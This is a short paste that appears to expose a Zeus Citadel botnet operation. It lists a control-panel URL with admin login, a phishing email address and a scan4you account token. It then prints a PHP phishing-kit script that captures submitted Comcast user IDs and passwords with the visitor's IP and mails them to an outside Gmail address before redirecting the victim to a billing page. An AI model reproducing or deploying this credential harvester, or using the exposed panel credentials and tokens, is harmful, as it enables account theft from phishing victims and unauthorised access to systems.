Zeus Citadel - 65.200.132.20 - Botnet

the admin ....

// panel 
http://65.200.132.20/webalizer/webdav/cp.php
admin:govno
// email used for phishing 
kotak4amal@gmail.com
// scan4you account and jabber
  'scan4you_jid' => 'uznik15@jabber.ru',
  'scan4you_id' => '29719',
  'scan4you_token' => 'd47310b2beea51ec546e',
// m.php
<?include 'images/validate_form.js';



$ip = getenv("REMOTE_ADDR");

$message .= "-------- XxX  *~* Mr-Lordz *~*  XxX-------\n";

$message .= "User-ID: ".$_POST['user']."\n";

$message .= "Password: ".$_POST['passwd']."\n";

$message .= "IP: ".$ip."\n";

$message .= "-------------Created By Mr-lordz--------------\n";



$recipient = "kotak4amal@gmail.com";

$subject = "ComCastID ~ $ip";

$headers = "From: ";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

mail($recipient,$subject,$message,$headers);

     if (mail($recipent,$subject,$message,$headers))

       {

           header("Location: billing.htm");



       }

else

           {

         echo "ERROR! Please go back and try again.";

         }



?>